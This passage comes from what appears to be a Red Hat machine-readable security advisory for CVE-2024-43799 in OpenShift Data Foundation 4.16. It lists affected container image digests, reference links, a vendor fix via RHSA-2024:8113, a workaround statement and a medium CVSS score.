"9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, references: [ { category: "self", summary: "Canonical URL", url: "https://access.redhat.com/security/cve/CVE-2024-43799", }, { category: "external", summary: "RHBZ#2311153", url: "https://bugzilla.redhat.com/show_bug.cgi?id=2311153", }, { category: "external", summary: "https://www.cve.org/CVERecord?id=CVE-2024-43799", url: "https://www.cve.org/CVERecord?id=CVE-2024-43799", }, { category: "external", summary: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", url: "https://nvd.nist.gov/vuln/detail/CVE-2024-43799", }, { category: "external", summary: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", url: "https://github.com/pillarjs/send/commit/ae4f2989491b392ae2ef3b0015a019770ae65d35", }, { category: "external", summary: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", url: "https://github.com/pillarjs/send/security/advisories/GHSA-m6fv-jmcg-4jfg", }, ], release_date: "2024-09-10T15:15:17.727000+00:00", remediations: [ { category: "vendor_fix", date: "2024-10-15T08:52:38+00:00", details: "Before applying this update, make sure all previously released errata relevant to your system have been applied.\n\nFor details on how to apply this update, refer to:\n\nhttps://access.redhat.com/articles/11258", product_ids: [ "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", ], restart_required: { category: "none", }, url: "https://access.redhat.com/errata/RHSA-2024:8113", }, { category: "workaround", details: "Mitigation for this issue is either not available or the currently available options do not meet the Red Hat Product Security criteria comprising ease of use and deployment, applicability to widespread installation base or stability.", product_ids: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:53da012c5fc8003c4d17008ba532c281c5f293d6933172119085b68088ccec7f_arm64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:6349fb76ed7d1b83ecddbadeb2325408eed283d02b12285f534407aea557362c_amd64", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:ea010d2fcf217dce8fe5aa185a43ec8e8fa4f3d640d479ad2ea940b4848cdd13_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:24dae6fe61af34d27e5fbed98f25dcfd0fe682703d4701c0047a123208012121_arm64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:338239cef29603d7cbc880655d11e9a370e79570930cb7e28ed388e386045d1c_s390x", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:33d6b3c313d90a89e662516e96fb590cc12b101f6f481acbd1837fe3fb15e2fc_amd64", "9Base-RHODF-4.16:odf4/odf-cli-rhel9@sha256:461d71b5b8ba5fc5d791f8a49e8cb996660591c2c5d4828a696b995f1556b9ac_ppc64le", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:3071570a86e4869917fd240f2ebd2fe045b3dade7d0ad02853285c1654a703a5_amd64", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:94e657d7b8477bc2606f677ee2621403faecc8bbc1f27acdc3821a40b2340698_s390x", "9Base-RHODF-4.16:odf4/odf-console-rhel9@sha256:e4cf3ad6d4fe832104a72e2689fa317b6bd26685418833dc2270e59e1459b189_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:12b532399f68a08e3cc526b49773c267ccf6d703a7b891e6a2b5ed8e43173b30_s390x", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:298866526088d05769c5e784b62c9681c1ef0315f8977a433e725f3aeb5e7920_ppc64le", "9Base-RHODF-4.16:odf4/odf-cosi-sidecar-rhel9@sha256:4ba8eb0bf46dad3c65c61882d92fa54de452dcdf642bd40504cd8bbd4494558f_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:55a0efdb08e6e261983905fee0867bffdb82ae48495b074e527ad26729192ab9_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:8721c6de61a7ee31e1312856e5887a36be7b1ce930fcba24b720097d286be6f6_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-operator-bundle@sha256:b8cc383dca903d2e229772937306456bde2b80ea3200ba354789a232fde825c9_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:1487325c0aabb062ce9dfe7f2b3a7b3ba03b42231455406b1f3818bda124a6e9_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:383a579a19c10dda694f373cd772b894e59791a36f4258b2cfb001968367e9c0_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:4005df877f43b05aaa7f63a77fa8ad29b980121fbb3eb97c4470c8744abb7a11_s390x", "9Base-RHODF-4.16:odf4/odf-csi-addons-rhel9-operator@sha256:6bcf351b998ef81fe66340e2bc27398165be0b6aafcf51233e772a4cdb02618c_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:2afcef0a34152e6828d79f4894d0da0badf275075e7bc1a91d1ab85f105a6a2d_ppc64le", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:3507841b2f0757a42fed5ba0e6e94a029ce924d98e085cc384798c2b37c019fe_amd64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:60b5a727c734903f0b1021b4a90c5bbfae5ca65fe0d51ec17399d47635289235_arm64", "9Base-RHODF-4.16:odf4/odf-csi-addons-sidecar-rhel9@sha256:9c9bbf026f4fcf7da90729b2c49850d16bb2b48997c68782117ef495c99b57ce_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:30fcd0f6e1fbb29456163e00a8c5c6c90d9c0dc27b0435a50cb42d20f52e686f_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:4000cc38f48546a17f728a2328871d3deda6015742f5a11587207ecf84225460_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-console-rhel9@sha256:de35a74ddbe766c84298d5347cdffe7fbf4a571028ae236cf0d70d409869c9f6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:26dc5caa38dc2e1d61d66820be14e991fee386d17f5405e801ab6141e317df64_amd64", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:4c13e76ea87a06a890fa71c6ed5b6998dc9999da1dcf230c9a0b6a333ff0e3e5_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-operator-bundle@sha256:dc943e771dfb8b180c13b84a0a2aebb9f9e01d720aa89f492ee8c120dd7af372_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:1b710bc135bc32558182995a18978ebf0a7c4509de1053db05db9a969343caf6_ppc64le", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:6f7cb7c3f4a5957c44972644b980d5f83beda026a48c97315b7a47b698f24e37_s390x", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:821a6dfb261e2736fd0a7728d50acbdbd6c74317034724571026c5e1ac150ec8_arm64", "9Base-RHODF-4.16:odf4/odf-multicluster-rhel9-operator@sha256:f056fae131175a4e179ad3f267f44562eec169383d382c67398eb5d3d74ab50a_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:00a38f702a6b771ff58392e323c52d3be66ec43d61a1b2c3a8664f92b6698ae3_amd64", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a0481ef7d603bbd4194d725bcd91992122ecc399460bf3c215de73ffc012e68a_ppc64le", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:a42e96f4758df3fc79cbd67b67b41ed2ef53db904395d8b08cbe5cd3f8e4ecb4_s390x", "9Base-RHODF-4.16:odf4/odf-must-gather-rhel9@sha256:e02a85818cb748b65fa29ba689b9240bc181087a50d96418499f0b7f3aa82f57_arm64", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:715f53af949614a8a72252a19edbe9eb84c53ac8434da6b32366039046e679e5_s390x", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:d56279132a543dca6c625f79ce118ee36b59ea6000cf5a895cda79c856eb1de1_ppc64le", "9Base-RHODF-4.16:odf4/odf-operator-bundle@sha256:e5c49afe79002be166f7b51421d712069ad6fe67c54743c8a991afd97f9f30f6_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:5ddcb5b3ff0a69c80857e5185dcfd9e397ba0ad1272e66cd98acd729996d006a_amd64", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:a91d41a5bfcf9b7fcd4504c59dd3d44be644ef5dea929d1b4dcb26fffec4f45c_s390x", "9Base-RHODF-4.16:odf4/odf-prometheus-operator-bundle@sha256:d721cfdfdb09d95432ca808a491618af38cd600d96a6157fdf0f00bf6ce616d1_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:28a47c19fadade32960712e3e23c21ef79369c045d2016f00564a9291b483dfd_amd64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:6cef9e6774596153f83743a8cfa1919e8eee26c19145e5cf36c3adf6a4f58d6b_arm64", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:71683f56cbcf5378086924b7c4f3666815d30463b74f801df0fa9f6781a421ea_ppc64le", "9Base-RHODF-4.16:odf4/odf-rhel9-operator@sha256:8a812868150ffa298110bf81d30ae3aecf152003ed64f927f1416e36cc0e579d_s390x", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:1777e37400e5e8d736bbeec8a0123b573eb77b416460322c082c25f711b6af0d_amd64", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:3a20e65f8638501afd7c8580c72fed84dd1629e59e019303a0edd3e0ce89c203_ppc64le", "9Base-RHODF-4.16:odf4/odr-cluster-operator-bundle@sha256:a49df6e9be0a6554622abc1d01ed872271b89cc97c802cb8c90bd969943d31f9_s390x", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:3f018797c5507d4404ba92363f714ce948e095920fe9ddfcee447ef86a51823a_ppc64le", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:c94c1be03b3bb6b62c233102048cc34f051c7b23de2cb6548869df4db6646996_amd64", "9Base-RHODF-4.16:odf4/odr-hub-operator-bundle@sha256:f20e6ba21e4ad8e7d66b8de3b7f4d5f5580ef414c55134a28c1c025da365b3b0_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:3132999b2b34ff74ede22b057de9005714c91e2d31d3727924ea0960dc5b8231_ppc64le", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:8d320cc20359f8d44957a72cfb80f98f228506fbb9b9318cddd64a3120166356_s390x", "9Base-RHODF-4.16:odf4/odr-recipe-operator-bundle@sha256:f221b43415c44080b49785f4a35447dc529e0d27c17a76057df6b80992ac5388_amd64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:570760ed13629409e8533a91823f1c0b1f331d97590b1a47b0b15f4b35793ceb_arm64", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:742bf306d06ae5ed557c629ca4be3b5ae24a0f4dff37d7da106d4f112066f26e_ppc64le", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:9b57ab1ec3d520d8c8fbc3584cd833b2262b6fa949c3b84cbbc43b899f0314e5_s390x", "9Base-RHODF-4.16:odf4/odr-rhel9-operator@sha256:b67afc5228f117432c8428782f72faf2b9b6ae1ae352aca9e0055a2ff9006d26_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:0843c3f61fa90cfafde569816b59ff0c8e5e69663cd9d58832204d074a2fcfc6_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:3d6a235a8365186279b13335bbd6705efeac2fcd4211acd79df2b62de701479a_s390x", "9Base-RHODF-4.16:odf4/rook-ceph-operator-bundle@sha256:d97b31272d77f0b0552844cc58749b772d71bef73d40bd2bf7befdad86d139e4_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:0a59997f6099bd93380e06a044122c51b8ffd9c269460cb3bb5541cde795cec2_ppc64le", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:1530173486535fd574caae9d8e537701ac4d1782ed08248129041ad9ada52b20_amd64", "9Base-RHODF-4.16:odf4/rook-ceph-rhel9-operator@sha256:b91c27e3cc9b1b35eaeac17e8b34da3cf0450584105a08f2cf3406c5ed41d7aa_s390x", ], }, ], scores: [ { cvss_v3: { attackComplexity: "HIGH", attackVector: "NETWORK", availabilityImpact: "LOW", baseScore: 5, baseSeverity: "MEDIUM", confidentialityImpact: "LOW", integrityImpact: "LOW", privilegesRequired: "NONE", scope: "UNCHANGED", userInteraction: "REQUIRED", vectorString: "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:L/I:L/A:L", version: "3.1", }, products: [ "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:2607716e0f81e3bd7b1142bb659e7e014281df7af15ae1902c119785f109873d_ppc64le", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:6312b4e4365530b398d34769da34113b156ff407d0189d2b909c2b27a5b344c5_amd64", "9Base-RHODF-4.16:odf4/cephcsi-rhel9@sha256:7bffeec5f90000df7742e44dea55694e966fa0b35f5895aac0a1163bbce6573c_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:5677389d91ef1e73da79a495d18bb47a94ecbe541395d8e2912595d5409841d2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:64f6ce88210656474cacf611b1e54eeb88be36f0e0e919719fa55ba3ec5a8bd3_s390x", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:9eb29e92f64fb85151d6fced24d3b97ecd73df25d00d9c27bc43b08c41c48b55_amd64", "9Base-RHODF-4.16:odf4/mcg-core-rhel9@sha256:b06359b7d2322e5b95cc23a13b6c7fe1fdabe19b4623117b1525ac3f2a211c8e_arm64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:1932ade33bd22b30845c64d083fc649807c0a63668ced57998eb2e623e6b487b_s390x", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:5dc780b845bf22a5ed8350a0c8783d1fb8a0fef4ce2e1c3265db82fd236ea3e1_amd64", "9Base-RHODF-4.16:odf4/mcg-operator-bundle@sha256:e966bb50e83675453833e88fdc4a384f429d96a8430ad6849972fbc15c0f8313_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:0e0a5877546c28076ad99cc22e560d6c952959c142e269fa83d866d5fff95e87_amd64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:7e44ee05c11d6ff10a07a59484ddc004eb9ba0acc5ff1f6b54d37912e4f7daf2_ppc64le", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:b1580bce974d3d6768f9f091b0d9ccc24756ab493ccc46a253a48af5e08db5e2_arm64", "9Base-RHODF-4.16:odf4/mcg-rhel9-operator@sha256:d87027dd4c0573b4f2eda78a8d3a53ef0862569d5ab8be3d6abd4a7cc8bc9f8d_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:4213b28df164ae81f6d9698f4efe2569501668cbce2fe8214c19cc540a0c2141_s390x", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:aedb8552fc5969cfa7bc090add6421848a91b06f4ef94a1922c2365bd69a8559_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-console-rhel9@sha256:bf828ca2293ac3be275613872212e56049880a2a8ad6c8f1bb5bb66187d8e085_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:123523041fe4092a36fd41cc6203802d903188642bde1a40f22515a5715fff81_amd64", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:9e60966e93cc650b970b128498c02ede3df259be1736f3feb502768745d94c0a_s390x", "9Base-RHODF-4.16:odf4/ocs-client-operator-bundle@sha256:f4bb37b39c1325a3964753b1fa8bac4b9303f9031f367f004430251377361eb4_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:30add37f7ed1f17b871669c8ffd2a800ad2a17fdd805240bf96f247507703047_ppc64le", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:9838494b592782f0ba76f7a6c35f0038c0cb8853f6fff4ee9f7001a9888be5e7_amd64", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:eb2954eba23c0e2763e96c65eea09d3b1b482d3462cc5486b37f0f963f7344a8_s390x", "9Base-RHODF-4.16:odf4/ocs-client-rhel9-operator@sha256:fd7885c63cf3088c6704f0fccdf36e0ba26ef588854ec9eb59047f51da35f3f8_arm64", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:50c5c58e1e065bc03b7e71116a48ee39080539c4b81b8ef0b9899454385f60cb_ppc64le", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:548a850169f3a90b5ee62e175aeb9c6d6fb24d2980d55fc86e0ab7eafef9f825_s390x", "9Base-RHODF-4.16:odf4/ocs-metrics-exporter-rhel9@sha256:6b0b554925b945370aeb786e45f7f8676f8760c572df03153b8682bd42e8d477_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:1bbc151acb46edd4c042acd66d028eaa6b514204ad79c8be708d89f07c9f9e81_amd64", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:8b1349f42b72eff94f35195729cb6f3f93a3c80def65581222e6ab571d0e4bf1_s390x", "9Base-RHODF-4.16:odf4/ocs-operator-bundle@sha256:f4956bd8ff8abed1fd909c77323ba62300e3a10080ebf45e295960ee9b13849c_ppc64le", "9Base-RHODF-4.16:odf4/ocs-rhel9-operator@sha256:4c40801e077d40dfeeb97b835f67e5e2868d9b867f062fd4fc6e98a34021ca1e_ppc64le", 